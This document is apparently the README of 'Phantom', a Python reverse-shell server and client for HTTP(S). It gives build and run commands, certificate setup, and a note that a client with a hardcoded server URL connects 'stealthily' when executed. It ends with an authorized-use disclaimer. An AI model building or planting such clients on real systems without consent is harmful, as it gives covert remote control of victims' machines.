Phantom – A multi-platform HTTP(S) Reverse Shell Server and Client
Phantom is a multi-platform HTTP(S) Reverse Shell server and client in Python 3. Binaries for Linux and Windows platforms can be built through an embedded script that executes PyInstaller.
Reverse shells can be established through HTTP or HTTPS. The certificates used for HTTPS can be auto-generated by Phantom or supplied by the user.
Phantom includes a helper shell script that enables the fast generation of self-signed certificates for use of both servers and clients. After generation, the server and certificate authority certificates required for encrypted connections are bundled in the binaries for portability and ease of execution.
Demo
Try it out!
Simply head over to the dist directory and download the pre-built Linux/Unix or Windows binaries.
The HTTP client files are set to connect to http://localhost:8080, whereas the HTTPS client bundles a CA certificate file for https://localhost:4443 and will only connect to this socket. With that in mind, choose either HTTP or HTTPS and run the server on one shell:
./linux_server http://localhost:8080
<-- or -->
./linux_server https://localhost:4443
And the client on another one…
./http_linux_client
<-- or -->
./https_linux_client
The same procedure works for the Windows binaries.
Setup
HTTP Server and Client
You don’t need to set up the server and client for HTTP connections. The server will work straight out-of-the-box and the client will connect to any HTTP server. Just download the HTTP binaries from dist and you’re done. Execute the binaries with the --help option for instructions.
HTTPS Server and Client
Encrypted communication through HTTPS requires at least two certificates: One for the server, named server.pem by default, and another for the certificate authority, or ca.pem. Phantom bundles both files in binaries for fast deployment. They can be generated by multiple methods or by a simple execution of the generate_certs.sh helper script.
Once the certificates are ready you only need to follow the steps from the Build and Run section below.
Build and Run an HTTPS Server/Client
I. Install Dependencies
Dependency management works with both Poetry (recommended) and Virtualenv. You need to install all dependencies before building binaries.
git clone https://github.com/EONRaider/BCA-Phantom.git
cd BCA-Phantom
poetry install <--or--> pip install -r requirements.txt
II. Build HTTPS Server and Client binaries
The build.py file centralizes the process and takes care of it all. Notice that a built Client binary contains a hardcoded server URL. The connection to the server can be stealthily performed by simply executing the binary.
- Build and run the Server
python build.py server --server-cert /path/to/server.pem ./linux_server SERVER_URL - Build and run the Client
python build.py client --url SERVER_URL --ca-cert /path/to/ca.pem ./https_linux_client
The same procedure works for the Windows binaries.
Legal Disclaimer
The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity, and/or availability of systems and their associated resources. In this context the term “compromise” is henceforth understood as the leverage of exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.
The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.
